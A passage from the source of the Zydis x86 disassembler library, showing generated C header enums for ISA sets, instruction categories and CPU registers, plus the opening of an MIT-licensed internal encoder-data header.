79 | ZYDIS_ISA_SET_AVX512_VPCLMULQDQ_512,
80 | ZYDIS_ISA_SET_AVX512_VPOPCNTDQ_128,
81 | ZYDIS_ISA_SET_AVX512_VPOPCNTDQ_256,
82 | ZYDIS_ISA_SET_AVX512_VPOPCNTDQ_512,
83 | ZYDIS_ISA_SET_AVXAES,
84 | ZYDIS_ISA_SET_AVX_GFNI,
85 | ZYDIS_ISA_SET_AVX_IFMA,
86 | ZYDIS_ISA_SET_AVX_NE_CONVERT,
87 | ZYDIS_ISA_SET_AVX_VNNI,
88 | ZYDIS_ISA_SET_AVX_VNNI_INT16,
89 | ZYDIS_ISA_SET_AVX_VNNI_INT8,
90 | ZYDIS_ISA_SET_BMI1,
91 | ZYDIS_ISA_SET_BMI2,
92 | ZYDIS_ISA_SET_CET,
93 | ZYDIS_ISA_SET_CLDEMOTE,
94 | ZYDIS_ISA_SET_CLFLUSHOPT,
95 | ZYDIS_ISA_SET_CLFSH,
96 | ZYDIS_ISA_SET_CLWB,
97 | ZYDIS_ISA_SET_CLZERO,
98 | ZYDIS_ISA_SET_CMOV,
99 | ZYDIS_ISA_SET_CMPXCHG16B,
100 | ZYDIS_ISA_SET_ENQCMD,
101 | ZYDIS_ISA_SET_F16C,
102 | ZYDIS_ISA_SET_FAT_NOP,
103 | ZYDIS_ISA_SET_FCMOV,
104 | ZYDIS_ISA_SET_FCOMI,
105 | ZYDIS_ISA_SET_FMA,
106 | ZYDIS_ISA_SET_FMA4,
107 | ZYDIS_ISA_SET_FXSAVE,
108 | ZYDIS_ISA_SET_FXSAVE64,
109 | ZYDIS_ISA_SET_GFNI,
110 | ZYDIS_ISA_SET_HRESET,
111 | ZYDIS_ISA_SET_I186,
112 | ZYDIS_ISA_SET_I286PROTECTED,
113 | ZYDIS_ISA_SET_I286REAL,
114 | ZYDIS_ISA_SET_I386,
115 | ZYDIS_ISA_SET_I486,
116 | ZYDIS_ISA_SET_I486REAL,
117 | ZYDIS_ISA_SET_I86,
118 | ZYDIS_ISA_SET_ICACHE_PREFETCH,
119 | ZYDIS_ISA_SET_INVPCID,
120 | ZYDIS_ISA_SET_KEYLOCKER,
121 | ZYDIS_ISA_SET_KEYLOCKER_WIDE,
122 | ZYDIS_ISA_SET_KNCE,
123 | ZYDIS_ISA_SET_KNCJKBR,
124 | ZYDIS_ISA_SET_KNCSTREAM,
125 | ZYDIS_ISA_SET_KNCV,
126 | ZYDIS_ISA_SET_KNC_MISC,
127 | ZYDIS_ISA_SET_KNC_PF_HINT,
128 | ZYDIS_ISA_SET_LAHF,
129 | ZYDIS_ISA_SET_LONGMODE,
130 | ZYDIS_ISA_SET_LWP,
131 | ZYDIS_ISA_SET_LZCNT,
132 | ZYDIS_ISA_SET_MCOMMIT,
133 | ZYDIS_ISA_SET_MONITOR,
134 | ZYDIS_ISA_SET_MONITORX,
135 | ZYDIS_ISA_SET_MOVBE,
136 | ZYDIS_ISA_SET_MOVDIR,
137 | ZYDIS_ISA_SET_MPX,
138 | ZYDIS_ISA_SET_MSRLIST,
139 | ZYDIS_ISA_SET_PADLOCK_ACE,
140 | ZYDIS_ISA_SET_PADLOCK_PHE,
141 | ZYDIS_ISA_SET_PADLOCK_PMM,
142 | ZYDIS_ISA_SET_PADLOCK_RNG,
143 | ZYDIS_ISA_SET_PAUSE,
144 | ZYDIS_ISA_SET_PBNDKB,
145 | ZYDIS_ISA_SET_PCLMULQDQ,
146 | ZYDIS_ISA_SET_PCOMMIT,
147 | ZYDIS_ISA_SET_PCONFIG,
148 | ZYDIS_ISA_SET_PENTIUMMMX,
149 | ZYDIS_ISA_SET_PENTIUMREAL,
150 | ZYDIS_ISA_SET_PKU,
151 | ZYDIS_ISA_SET_POPCNT,
152 | ZYDIS_ISA_SET_PPRO,
153 | ZYDIS_ISA_SET_PREFETCHWT1,
154 | ZYDIS_ISA_SET_PREFETCH_NOP,
155 | ZYDIS_ISA_SET_PT,
156 | ZYDIS_ISA_SET_RAO_INT,
157 | ZYDIS_ISA_SET_RDPID,
158 | ZYDIS_ISA_SET_RDPMC,
159 | ZYDIS_ISA_SET_RDPRU,
160 | ZYDIS_ISA_SET_RDRAND,
161 | ZYDIS_ISA_SET_RDSEED,
162 | ZYDIS_ISA_SET_RDTSCP,
163 | ZYDIS_ISA_SET_RDWRFSGS,
164 | ZYDIS_ISA_SET_RTM,
165 | ZYDIS_ISA_SET_SERIALIZE,
166 | ZYDIS_ISA_SET_SGX,
167 | ZYDIS_ISA_SET_SGX_ENCLV,
168 | ZYDIS_ISA_SET_SHA,
169 | ZYDIS_ISA_SET_SHA512,
170 | ZYDIS_ISA_SET_SM3,
171 | ZYDIS_ISA_SET_SM4,
172 | ZYDIS_ISA_SET_SMAP,
173 | ZYDIS_ISA_SET_SMX,
174 | ZYDIS_ISA_SET_SNP,
175 | ZYDIS_ISA_SET_SSE,
176 | ZYDIS_ISA_SET_SSE2,
177 | ZYDIS_ISA_SET_SSE2MMX,
178 | ZYDIS_ISA_SET_SSE3,
179 | ZYDIS_ISA_SET_SSE3X87,
180 | ZYDIS_ISA_SET_SSE4,
181 | ZYDIS_ISA_SET_SSE42,
182 | ZYDIS_ISA_SET_SSE4A,
183 | ZYDIS_ISA_SET_SSEMXCSR,
184 | ZYDIS_ISA_SET_SSE_PREFETCH,
185 | ZYDIS_ISA_SET_SSSE3,
186 | ZYDIS_ISA_SET_SSSE3MMX,
187 | ZYDIS_ISA_SET_SVM,
188 | ZYDIS_ISA_SET_TBM,
189 | ZYDIS_ISA_SET_TDX,
190 | ZYDIS_ISA_SET_TSX_LDTRK,
191 | ZYDIS_ISA_SET_UINTR,
192 | ZYDIS_ISA_SET_VAES,
193 | ZYDIS_ISA_SET_VMFUNC,
194 | ZYDIS_ISA_SET_VPCLMULQDQ,
195 | ZYDIS_ISA_SET_VTX,
196 | ZYDIS_ISA_SET_WAITPKG,
197 | ZYDIS_ISA_SET_WRMSRNS,
198 | ZYDIS_ISA_SET_X87,
199 | ZYDIS_ISA_SET_XOP,
200 | ZYDIS_ISA_SET_XSAVE,
201 | ZYDIS_ISA_SET_XSAVEC,
202 | ZYDIS_ISA_SET_XSAVEOPT,
203 | ZYDIS_ISA_SET_XSAVES,
204 |
205 | /**
206 | * Maximum value of this enum.
207 | */
208 | ZYDIS_ISA_SET_MAX_VALUE = ZYDIS_ISA_SET_XSAVES,
209 | /**
210 | * The minimum number of bits required to represent all values of this enum.
211 | */
212 | ZYDIS_ISA_SET_REQUIRED_BITS = ZYAN_BITS_TO_REPRESENT(ZYDIS_ISA_SET_MAX_VALUE)
213 | } ZydisISASet;
214 |
--------------------------------------------------------------------------------
/inc/Zydis/Generated/EnumInstructionCategory.h:
--------------------------------------------------------------------------------
1 | /**
2 | * Defines the `ZydisInstructionCategory` enum.
3 | */
4 | typedef enum ZydisInstructionCategory_
5 | {
6 | ZYDIS_CATEGORY_INVALID,
7 | ZYDIS_CATEGORY_ADOX_ADCX,
8 | ZYDIS_CATEGORY_AES,
9 | ZYDIS_CATEGORY_AMD3DNOW,
10 | ZYDIS_CATEGORY_AMX_TILE,
11 | ZYDIS_CATEGORY_AVX,
12 | ZYDIS_CATEGORY_AVX2,
13 | ZYDIS_CATEGORY_AVX2GATHER,
14 | ZYDIS_CATEGORY_AVX512,
15 | ZYDIS_CATEGORY_AVX512_4FMAPS,
16 | ZYDIS_CATEGORY_AVX512_4VNNIW,
17 | ZYDIS_CATEGORY_AVX512_BITALG,
18 | ZYDIS_CATEGORY_AVX512_VBMI,
19 | ZYDIS_CATEGORY_AVX512_VP2INTERSECT,
20 | ZYDIS_CATEGORY_AVX_IFMA,
21 | ZYDIS_CATEGORY_BINARY,
22 | ZYDIS_CATEGORY_BITBYTE,
23 | ZYDIS_CATEGORY_BLEND,
24 | ZYDIS_CATEGORY_BMI1,
25 | ZYDIS_CATEGORY_BMI2,
26 | ZYDIS_CATEGORY_BROADCAST,
27 | ZYDIS_CATEGORY_CALL,
28 | ZYDIS_CATEGORY_CET,
29 | ZYDIS_CATEGORY_CLDEMOTE,
30 | ZYDIS_CATEGORY_CLFLUSHOPT,
31 | ZYDIS_CATEGORY_CLWB,
32 | ZYDIS_CATEGORY_CLZERO,
33 | ZYDIS_CATEGORY_CMOV,
34 | ZYDIS_CATEGORY_COMPRESS,
35 | ZYDIS_CATEGORY_COND_BR,
36 | ZYDIS_CATEGORY_CONFLICT,
37 | ZYDIS_CATEGORY_CONVERT,
38 | ZYDIS_CATEGORY_DATAXFER,
39 | ZYDIS_CATEGORY_DECIMAL,
40 | ZYDIS_CATEGORY_ENQCMD,
41 | ZYDIS_CATEGORY_EXPAND,
42 | ZYDIS_CATEGORY_FCMOV,
43 | ZYDIS_CATEGORY_FLAGOP,
44 | ZYDIS_CATEGORY_FMA4,
45 | ZYDIS_CATEGORY_FP16,
46 | ZYDIS_CATEGORY_GATHER,
47 | ZYDIS_CATEGORY_GFNI,
48 | ZYDIS_CATEGORY_HRESET,
49 | ZYDIS_CATEGORY_IFMA,
50 | ZYDIS_CATEGORY_INTERRUPT,
51 | ZYDIS_CATEGORY_IO,
52 | ZYDIS_CATEGORY_IOSTRINGOP,
53 | ZYDIS_CATEGORY_KEYLOCKER,
54 | ZYDIS_CATEGORY_KEYLOCKER_WIDE,
55 | ZYDIS_CATEGORY_KMASK,
56 | ZYDIS_CATEGORY_KNC,
57 | ZYDIS_CATEGORY_KNCMASK,
58 | ZYDIS_CATEGORY_KNCSCALAR,
59 | ZYDIS_CATEGORY_LEGACY,
60 | ZYDIS_CATEGORY_LOGICAL,
61 | ZYDIS_CATEGORY_LOGICAL_FP,
62 | ZYDIS_CATEGORY_LZCNT,
63 | ZYDIS_CATEGORY_MISC,
64 | ZYDIS_CATEGORY_MMX,
65 | ZYDIS_CATEGORY_MOVDIR,
66 | ZYDIS_CATEGORY_MPX,
67 | ZYDIS_CATEGORY_MSRLIST,
68 | ZYDIS_CATEGORY_NOP,
69 | ZYDIS_CATEGORY_PADLOCK,
70 | ZYDIS_CATEGORY_PBNDKB,
71 | ZYDIS_CATEGORY_PCLMULQDQ,
72 | ZYDIS_CATEGORY_PCOMMIT,
73 | ZYDIS_CATEGORY_PCONFIG,
74 | ZYDIS_CATEGORY_PKU,
75 | ZYDIS_CATEGORY_POP,
76 | ZYDIS_CATEGORY_PREFETCH,
77 | ZYDIS_CATEGORY_PREFETCHWT1,
78 | ZYDIS_CATEGORY_PT,
79 | ZYDIS_CATEGORY_PUSH,
80 | ZYDIS_CATEGORY_RDPID,
81 | ZYDIS_CATEGORY_RDPRU,
82 | ZYDIS_CATEGORY_RDRAND,
83 | ZYDIS_CATEGORY_RDSEED,
84 | ZYDIS_CATEGORY_RDWRFSGS,
85 | ZYDIS_CATEGORY_RET,
86 | ZYDIS_CATEGORY_ROTATE,
87 | ZYDIS_CATEGORY_SCATTER,
88 | ZYDIS_CATEGORY_SEGOP,
89 | ZYDIS_CATEGORY_SEMAPHORE,
90 | ZYDIS_CATEGORY_SERIALIZE,
91 | ZYDIS_CATEGORY_SETCC,
92 | ZYDIS_CATEGORY_SGX,
93 | ZYDIS_CATEGORY_SHA,
94 | ZYDIS_CATEGORY_SHA512,
95 | ZYDIS_CATEGORY_SHIFT,
96 | ZYDIS_CATEGORY_SMAP,
97 | ZYDIS_CATEGORY_SSE,
98 | ZYDIS_CATEGORY_STRINGOP,
99 | ZYDIS_CATEGORY_STTNI,
100 | ZYDIS_CATEGORY_SYSCALL,
101 | ZYDIS_CATEGORY_SYSRET,
102 | ZYDIS_CATEGORY_SYSTEM,
103 | ZYDIS_CATEGORY_TBM,
104 | ZYDIS_CATEGORY_TSX_LDTRK,
105 | ZYDIS_CATEGORY_UFMA,
106 | ZYDIS_CATEGORY_UINTR,
107 | ZYDIS_CATEGORY_UNCOND_BR,
108 | ZYDIS_CATEGORY_VAES,
109 | ZYDIS_CATEGORY_VBMI2,
110 | ZYDIS_CATEGORY_VEX,
111 | ZYDIS_CATEGORY_VFMA,
112 | ZYDIS_CATEGORY_VPCLMULQDQ,
113 | ZYDIS_CATEGORY_VTX,
114 | ZYDIS_CATEGORY_WAITPKG,
115 | ZYDIS_CATEGORY_WIDENOP,
116 | ZYDIS_CATEGORY_WRMSRNS,
117 | ZYDIS_CATEGORY_X87_ALU,
118 | ZYDIS_CATEGORY_XOP,
119 | ZYDIS_CATEGORY_XSAVE,
120 | ZYDIS_CATEGORY_XSAVEOPT,
121 |
122 | /**
123 | * Maximum value of this enum.
124 | */
125 | ZYDIS_CATEGORY_MAX_VALUE = ZYDIS_CATEGORY_XSAVEOPT,
126 | /**
127 | * The minimum number of bits required to represent all values of this enum.
128 | */
129 | ZYDIS_CATEGORY_REQUIRED_BITS = ZYAN_BITS_TO_REPRESENT(ZYDIS_CATEGORY_MAX_VALUE)
130 | } ZydisInstructionCategory;
131 |
--------------------------------------------------------------------------------
/inc/Zydis/Generated/EnumRegister.h:
--------------------------------------------------------------------------------
1 | /**
2 | * Defines the `ZydisRegister` enum.
3 | */
4 | typedef enum ZydisRegister_
5 | {
6 | ZYDIS_REGISTER_NONE,
7 |
8 | // General purpose registers 8-bit
9 | ZYDIS_REGISTER_AL,
10 | ZYDIS_REGISTER_CL,
11 | ZYDIS_REGISTER_DL,
12 | ZYDIS_REGISTER_BL,
13 | ZYDIS_REGISTER_AH,
14 | ZYDIS_REGISTER_CH,
15 | ZYDIS_REGISTER_DH,
16 | ZYDIS_REGISTER_BH,
17 | ZYDIS_REGISTER_SPL,
18 | ZYDIS_REGISTER_BPL,
19 | ZYDIS_REGISTER_SIL,
20 | ZYDIS_REGISTER_DIL,
21 | ZYDIS_REGISTER_R8B,
22 | ZYDIS_REGISTER_R9B,
23 | ZYDIS_REGISTER_R10B,
24 | ZYDIS_REGISTER_R11B,
25 | ZYDIS_REGISTER_R12B,
26 | ZYDIS_REGISTER_R13B,
27 | ZYDIS_REGISTER_R14B,
28 | ZYDIS_REGISTER_R15B,
29 |
30 | // General purpose registers 16-bit
31 | ZYDIS_REGISTER_AX,
32 | ZYDIS_REGISTER_CX,
33 | ZYDIS_REGISTER_DX,
34 | ZYDIS_REGISTER_BX,
35 | ZYDIS_REGISTER_SP,
36 | ZYDIS_REGISTER_BP,
37 | ZYDIS_REGISTER_SI,
38 | ZYDIS_REGISTER_DI,
39 | ZYDIS_REGISTER_R8W,
40 | ZYDIS_REGISTER_R9W,
41 | ZYDIS_REGISTER_R10W,
42 | ZYDIS_REGISTER_R11W,
43 | ZYDIS_REGISTER_R12W,
44 | ZYDIS_REGISTER_R13W,
45 | ZYDIS_REGISTER_R14W,
46 | ZYDIS_REGISTER_R15W,
47 |
48 | // General purpose registers 32-bit
49 | ZYDIS_REGISTER_EAX,
50 | ZYDIS_REGISTER_ECX,
51 | ZYDIS_REGISTER_EDX,
52 | ZYDIS_REGISTER_EBX,
53 | ZYDIS_REGISTER_ESP,
54 | ZYDIS_REGISTER_EBP,
55 | ZYDIS_REGISTER_ESI,
56 | ZYDIS_REGISTER_EDI,
57 | ZYDIS_REGISTER_R8D,
58 | ZYDIS_REGISTER_R9D,
59 | ZYDIS_REGISTER_R10D,
60 | ZYDIS_REGISTER_R11D,
61 | ZYDIS_REGISTER_R12D,
62 | ZYDIS_REGISTER_R13D,
63 | ZYDIS_REGISTER_R14D,
64 | ZYDIS_REGISTER_R15D,
65 |
66 | // General purpose registers 64-bit
67 | ZYDIS_REGISTER_RAX,
68 | ZYDIS_REGISTER_RCX,
69 | ZYDIS_REGISTER_RDX,
70 | ZYDIS_REGISTER_RBX,
71 | ZYDIS_REGISTER_RSP,
72 | ZYDIS_REGISTER_RBP,
73 | ZYDIS_REGISTER_RSI,
74 | ZYDIS_REGISTER_RDI,
75 | ZYDIS_REGISTER_R8,
76 | ZYDIS_REGISTER_R9,
77 | ZYDIS_REGISTER_R10,
78 | ZYDIS_REGISTER_R11,
79 | ZYDIS_REGISTER_R12,
80 | ZYDIS_REGISTER_R13,
81 | ZYDIS_REGISTER_R14,
82 | ZYDIS_REGISTER_R15,
83 |
84 | // Floating point legacy registers
85 | ZYDIS_REGISTER_ST0,
86 | ZYDIS_REGISTER_ST1,
87 | ZYDIS_REGISTER_ST2,
88 | ZYDIS_REGISTER_ST3,
89 | ZYDIS_REGISTER_ST4,
90 | ZYDIS_REGISTER_ST5,
91 | ZYDIS_REGISTER_ST6,
92 | ZYDIS_REGISTER_ST7,
93 | ZYDIS_REGISTER_X87CONTROL,
94 | ZYDIS_REGISTER_X87STATUS,
95 | ZYDIS_REGISTER_X87TAG,
96 |
97 | // Floating point multimedia registers
98 | ZYDIS_REGISTER_MM0,
99 | ZYDIS_REGISTER_MM1,
100 | ZYDIS_REGISTER_MM2,
101 | ZYDIS_REGISTER_MM3,
102 | ZYDIS_REGISTER_MM4,
103 | ZYDIS_REGISTER_MM5,
104 | ZYDIS_REGISTER_MM6,
105 | ZYDIS_REGISTER_MM7,
106 |
107 | // Floating point vector registers 128-bit
108 | ZYDIS_REGISTER_XMM0,
109 | ZYDIS_REGISTER_XMM1,
110 | ZYDIS_REGISTER_XMM2,
111 | ZYDIS_REGISTER_XMM3,
112 | ZYDIS_REGISTER_XMM4,
113 | ZYDIS_REGISTER_XMM5,
114 | ZYDIS_REGISTER_XMM6,
115 | ZYDIS_REGISTER_XMM7,
116 | ZYDIS_REGISTER_XMM8,
117 | ZYDIS_REGISTER_XMM9,
118 | ZYDIS_REGISTER_XMM10,
119 | ZYDIS_REGISTER_XMM11,
120 | ZYDIS_REGISTER_XMM12,
121 | ZYDIS_REGISTER_XMM13,
122 | ZYDIS_REGISTER_XMM14,
123 | ZYDIS_REGISTER_XMM15,
124 | ZYDIS_REGISTER_XMM16,
125 | ZYDIS_REGISTER_XMM17,
126 | ZYDIS_REGISTER_XMM18,
127 | ZYDIS_REGISTER_XMM19,
128 | ZYDIS_REGISTER_XMM20,
129 | ZYDIS_REGISTER_XMM21,
130 | ZYDIS_REGISTER_XMM22,
131 | ZYDIS_REGISTER_XMM23,
132 | ZYDIS_REGISTER_XMM24,
133 | ZYDIS_REGISTER_XMM25,
134 | ZYDIS_REGISTER_XMM26,
135 | ZYDIS_REGISTER_XMM27,
136 | ZYDIS_REGISTER_XMM28,
137 | ZYDIS_REGISTER_XMM29,
138 | ZYDIS_REGISTER_XMM30,
139 | ZYDIS_REGISTER_XMM31,
140 |
141 | // Floating point vector registers 256-bit
142 | ZYDIS_REGISTER_YMM0,
143 | ZYDIS_REGISTER_YMM1,
144 | ZYDIS_REGISTER_YMM2,
145 | ZYDIS_REGISTER_YMM3,
146 | ZYDIS_REGISTER_YMM4,
147 | ZYDIS_REGISTER_YMM5,
148 | ZYDIS_REGISTER_YMM6,
149 | ZYDIS_REGISTER_YMM7,
150 | ZYDIS_REGISTER_YMM8,
151 | ZYDIS_REGISTER_YMM9,
152 | ZYDIS_REGISTER_YMM10,
153 | ZYDIS_REGISTER_YMM11,
154 | ZYDIS_REGISTER_YMM12,
155 | ZYDIS_REGISTER_YMM13,
156 | ZYDIS_REGISTER_YMM14,
157 | ZYDIS_REGISTER_YMM15,
158 | ZYDIS_REGISTER_YMM16,
159 | ZYDIS_REGISTER_YMM17,
160 | ZYDIS_REGISTER_YMM18,
161 | ZYDIS_REGISTER_YMM19,
162 | ZYDIS_REGISTER_YMM20,
163 | ZYDIS_REGISTER_YMM21,
164 | ZYDIS_REGISTER_YMM22,
165 | ZYDIS_REGISTER_YMM23,
166 | ZYDIS_REGISTER_YMM24,
167 | ZYDIS_REGISTER_YMM25,
168 | ZYDIS_REGISTER_YMM26,
169 | ZYDIS_REGISTER_YMM27,
170 | ZYDIS_REGISTER_YMM28,
171 | ZYDIS_REGISTER_YMM29,
172 | ZYDIS_REGISTER_YMM30,
173 | ZYDIS_REGISTER_YMM31,
174 |
175 | // Floating point vector registers 512-bit
176 | ZYDIS_REGISTER_ZMM0,
177 | ZYDIS_REGISTER_ZMM1,
178 | ZYDIS_REGISTER_ZMM2,
179 | ZYDIS_REGISTER_ZMM3,
180 | ZYDIS_REGISTER_ZMM4,
181 | ZYDIS_REGISTER_ZMM5,
182 | ZYDIS_REGISTER_ZMM6,
183 | ZYDIS_REGISTER_ZMM7,
184 | ZYDIS_REGISTER_ZMM8,
185 | ZYDIS_REGISTER_ZMM9,
186 | ZYDIS_REGISTER_ZMM10,
187 | ZYDIS_REGISTER_ZMM11,
188 | ZYDIS_REGISTER_ZMM12,
189 | ZYDIS_REGISTER_ZMM13,
190 | ZYDIS_REGISTER_ZMM14,
191 | ZYDIS_REGISTER_ZMM15,
192 | ZYDIS_REGISTER_ZMM16,
193 | ZYDIS_REGISTER_ZMM17,
194 | ZYDIS_REGISTER_ZMM18,
195 | ZYDIS_REGISTER_ZMM19,
196 | ZYDIS_REGISTER_ZMM20,
197 | ZYDIS_REGISTER_ZMM21,
198 | ZYDIS_REGISTER_ZMM22,
199 | ZYDIS_REGISTER_ZMM23,
200 | ZYDIS_REGISTER_ZMM24,
201 | ZYDIS_REGISTER_ZMM25,
202 | ZYDIS_REGISTER_ZMM26,
203 | ZYDIS_REGISTER_ZMM27,
204 | ZYDIS_REGISTER_ZMM28,
205 | ZYDIS_REGISTER_ZMM29,
206 | ZYDIS_REGISTER_ZMM30,
207 | ZYDIS_REGISTER_ZMM31,
208 |
209 | // Matrix registers
210 | ZYDIS_REGISTER_TMM0,
211 | ZYDIS_REGISTER_TMM1,
212 | ZYDIS_REGISTER_TMM2,
213 | ZYDIS_REGISTER_TMM3,
214 | ZYDIS_REGISTER_TMM4,
215 | ZYDIS_REGISTER_TMM5,
216 | ZYDIS_REGISTER_TMM6,
217 | ZYDIS_REGISTER_TMM7,
218 |
219 | // Flags registers
220 | ZYDIS_REGISTER_FLAGS,
221 | ZYDIS_REGISTER_EFLAGS,
222 | ZYDIS_REGISTER_RFLAGS,
223 |
224 | // Instruction-pointer registers
225 | ZYDIS_REGISTER_IP,
226 | ZYDIS_REGISTER_EIP,
227 | ZYDIS_REGISTER_RIP,
228 |
229 | // Segment registers
230 | ZYDIS_REGISTER_ES,
231 | ZYDIS_REGISTER_CS,
232 | ZYDIS_REGISTER_SS,
233 | ZYDIS_REGISTER_DS,
234 | ZYDIS_REGISTER_FS,
235 | ZYDIS_REGISTER_GS,
236 |
237 | // Table registers
238 | ZYDIS_REGISTER_GDTR,
239 | ZYDIS_REGISTER_LDTR,
240 | ZYDIS_REGISTER_IDTR,
241 | ZYDIS_REGISTER_TR,
242 |
243 | // Test registers
244 | ZYDIS_REGISTER_TR0,
245 | ZYDIS_REGISTER_TR1,
246 | ZYDIS_REGISTER_TR2,
247 | ZYDIS_REGISTER_TR3,
248 | ZYDIS_REGISTER_TR4,
249 | ZYDIS_REGISTER_TR5,
250 | ZYDIS_REGISTER_TR6,
251 | ZYDIS_REGISTER_TR7,
252 |
253 | // Control registers
254 | ZYDIS_REGISTER_CR0,
255 | ZYDIS_REGISTER_CR1,
256 | ZYDIS_REGISTER_CR2,
257 | ZYDIS_REGISTER_CR3,
258 | ZYDIS_REGISTER_CR4,
259 | ZYDIS_REGISTER_CR5,
260 | ZYDIS_REGISTER_CR6,
261 | ZYDIS_REGISTER_CR7,
262 | ZYDIS_REGISTER_CR8,
263 | ZYDIS_REGISTER_CR9,
264 | ZYDIS_REGISTER_CR10,
265 | ZYDIS_REGISTER_CR11,
266 | ZYDIS_REGISTER_CR12,
267 | ZYDIS_REGISTER_CR13,
268 | ZYDIS_REGISTER_CR14,
269 | ZYDIS_REGISTER_CR15,
270 |
271 | // Debug registers
272 | ZYDIS_REGISTER_DR0,
273 | ZYDIS_REGISTER_DR1,
274 | ZYDIS_REGISTER_DR2,
275 | ZYDIS_REGISTER_DR3,
276 | ZYDIS_REGISTER_DR4,
277 | ZYDIS_REGISTER_DR5,
278 | ZYDIS_REGISTER_DR6,
279 | ZYDIS_REGISTER_DR7,
280 | ZYDIS_REGISTER_DR8,
281 | ZYDIS_REGISTER_DR9,
282 | ZYDIS_REGISTER_DR10,
283 | ZYDIS_REGISTER_DR11,
284 | ZYDIS_REGISTER_DR12,
285 | ZYDIS_REGISTER_DR13,
286 | ZYDIS_REGISTER_DR14,
287 | ZYDIS_REGISTER_DR15,
288 |
289 | // Mask registers
290 | ZYDIS_REGISTER_K0,
291 | ZYDIS_REGISTER_K1,
292 | ZYDIS_REGISTER_K2,
293 | ZYDIS_REGISTER_K3,
294 | ZYDIS_REGISTER_K4,
295 | ZYDIS_REGISTER_K5,
296 | ZYDIS_REGISTER_K6,
297 | ZYDIS_REGISTER_K7,
298 |
299 | // Bound registers
300 | ZYDIS_REGISTER_BND0,
301 | ZYDIS_REGISTER_BND1,
302 | ZYDIS_REGISTER_BND2,
303 | ZYDIS_REGISTER_BND3,
304 | ZYDIS_REGISTER_BNDCFG,
305 | ZYDIS_REGISTER_BNDSTATUS,
306 |
307 | // Uncategorized
308 | ZYDIS_REGISTER_MXCSR,
309 | ZYDIS_REGISTER_PKRU,
310 | ZYDIS_REGISTER_XCR0,
311 | ZYDIS_REGISTER_UIF,
312 |
313 | /**
314 | * Maximum value of this enum.
315 | */
316 | ZYDIS_REGISTER_MAX_VALUE = ZYDIS_REGISTER_UIF,
317 | /**
318 | * The minimum number of bits required to represent all values of this enum.
319 | */
320 | ZYDIS_REGISTER_REQUIRED_BITS = ZYAN_BITS_TO_REPRESENT(ZYDIS_REGISTER_MAX_VALUE)
321 | } ZydisRegister;
322 |
--------------------------------------------------------------------------------
/inc/Zydis/Internal/EncoderData.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Disassembler Library (Zydis)
4 |
5 | Original Author : Mappa
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | #ifndef ZYDIS_INTERNAL_ENCODERDATA_H
28 | #define ZYDIS_INTERNAL_ENCODERDATA_H
29 |
30 | #include
31 | #include
32 | #include
33 |
34 | /**
35 | * Used in encoder's table to represent standard ISA sizes in form of bit flags.
36 | */
37 | typedef enum ZydisWidthFlag_
38 | {
39 | ZYDIS_WIDTH_INVALID = 0x00,
40 | ZYDIS_WIDTH_16 = 0x01,
41 | ZYDIS_WIDTH_32 = 0x02,
42 | ZYDIS_WIDTH_64 = 0x04,
43 |
44 | /**
45 | * Maximum value of this enum.
46 | */
47 | ZYDIS_WIDTH_MAX_VALUE = (ZYDIS_WIDTH_64 | (ZYDIS_WIDTH_64 - 1)),
48 | /**
49 | * The minimum number of bits required to represent all values of this enum.
50 | */
51 | ZYDIS_WIDTH_REQUIRED_BITS = ZYAN_BITS_TO_REPRESENT(ZYDIS_WIDTH_MAX_VALUE)
52 | } ZydisWidthFlag;
53 |
54 | /**
55 | * Used in encoder's table to represent mandatory instruction prefix. Using this enum instead of
56 | * actual prefix value saves space.
57 | */
58 | typedef enum ZydisMandatoryPrefix_
59 | {
60 | ZYDIS_MANDATORY_PREFIX_NONE,
61 | ZYDIS_MANDATORY_PREFIX_66,
62 | ZYDIS_MANDATORY_PREFIX_F2,
63 | ZYDIS_MANDATORY_PREFIX_F3,
64 |
65 | /**
66 | * Maximum value of this enum.
67 | */
68 | ZYDIS_MANDATORY_PREFIX_MAX_VALUE = ZYDIS_MANDATORY_PREFIX_F3,
69 | /**
70 | * The minimum number of bits required to represent all values of this enum.
71 | */
72 | ZYDIS_MANDATORY_PREFIX_REQUIRED_BITS = ZYAN_BITS_TO_REPRESENT(ZYDIS_MANDATORY_PREFIX_MAX_VALUE)
73 | } ZydisMandatoryPrefix;
74 |
75 | /**
76 | * Used in encoder's table to represent vector size supported by instruction definition.
77 | */
78 | typedef enum ZydisVectorLength_
79 | {
80 | ZYDIS_VECTOR_LENGTH_INVALID,
81 | ZYDIS_VECTOR_LENGTH_128,
82 | ZYDIS_VECTOR_LENGTH_256,
83 | ZYDIS_VECTOR_LENGTH_512,
84 |
85 | /**
86 | * Maximum value of this enum.
87 | */
88 | ZYDIS_VECTOR_LENGTH_MAX_VALUE = ZYDIS_VECTOR_LENGTH_512,
89 | /**
90 | * The minimum number of bits required to represent all values of this enum.
91 | */
92 | ZYDIS_VECTOR_LENGTH_REQUIRED_BITS = ZYAN_BITS_TO_REPRESENT(ZYDIS_VECTOR_LENGTH_MAX_VALUE)
93 | } ZydisVectorLength;
94 |
95 | /**
96 | * Used in encoder's table to represent hint type supported by instruction definition.
97 | */
98 | typedef enum ZydisSizeHint_
99 | {
100 | ZYDIS_SIZE_HINT_NONE,
101 | ZYDIS_SIZE_HINT_ASZ,
102 | ZYDIS_SIZE_HINT_OSZ,
103 |
104 | /**
105 | * Maximum value of this enum.
106 | */
